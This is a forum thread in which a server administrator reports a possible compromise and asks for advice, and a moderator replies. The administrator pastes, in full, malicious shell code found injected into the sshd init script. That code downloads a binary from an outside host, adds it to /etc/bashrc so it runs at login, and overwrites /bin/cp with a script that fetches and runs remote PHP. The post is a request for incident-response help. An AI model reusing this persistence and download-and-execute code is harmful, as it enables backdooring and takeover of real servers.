Server Possibly Compromised

[mordormx]

Hi guys
today i detect some weird lines in /etc/init.d/sshd at the start function, this is the content

start()

{

[ -x $SSHD ] || exit 5

[ -f /etc/ssh/sshd_config ] || exit 6

# Create keys if necessary

if [ "x${AUTOCREATE_SERVER_KEYS}" != xNO ]; then

do_rsa_keygen

if [ "x${AUTOCREATE_SERVER_KEYS}" != xRSAONLY ]; then

do_rsa1_keygen

do_dsa_keygen

fi

fi





Inject='/etc/bashrc' #/etc/bashrc

Bar='/bin/bar' #/bin/bar


if [[ ! -a $Bar ]]; then

wget http://example.com/Dynamic/g/bar >/dev/null 2>&1

chmod 755 bar >/dev/null 2>&1

mv bar $Bar >/dev/null 2>&1

fi;

if ! grep -q $Bar $Inject; then

echo -e "$Bar >/dev/null 2>&1" >> $Inject

fi;


if [[ ! grep -q "example.com" /bin/cp ]]; then

cp /bin/cp /bin/copy >/dev/null 2>&1

echo -e '#!/bin/sh\r\nwget http://example.com/Dynamic/g/run.txt >/dev/null 2>&1\r\nmv run.txt run.php\r\nchmod +x run.php\r\nph

p run.php\r\nrm -rf run.php >/dev/null 2>&1' > /bin/cp

chmod 755 /bin/cp

fi;


Now the content of /bin/cp is
#!/bin/bash

Inject="/etc/bashrc" #/etc/bashrc

Bar="/bin/bar" #/bin/bar

if [[ ! -a $Bar ]]; then

wget http://example.com/Dynamic/g/bar >/dev/null 2>&1

chmod 755 bar >/dev/null 2>&1

mv bar $Bar >/dev/null 2>&1

fi;

if ! grep -q "$Bar" $Inject; then

echo -e "\n$Bar >/dev/null 2>&1" >> $Inject

fi;

copy

Have any of you experienced this?

Checking this URL http://example.com/Dynamic/g/run.txt
looks like a very dangerous code, now i have to research for the way it happened.

Any advice or comment?

 

[Infopro]

Please don't post actual links or domain names in your posts. Especially those to compromised servers.

cPanel is unable to assist you with a compromised server, you should seek the assistance of a professional about this.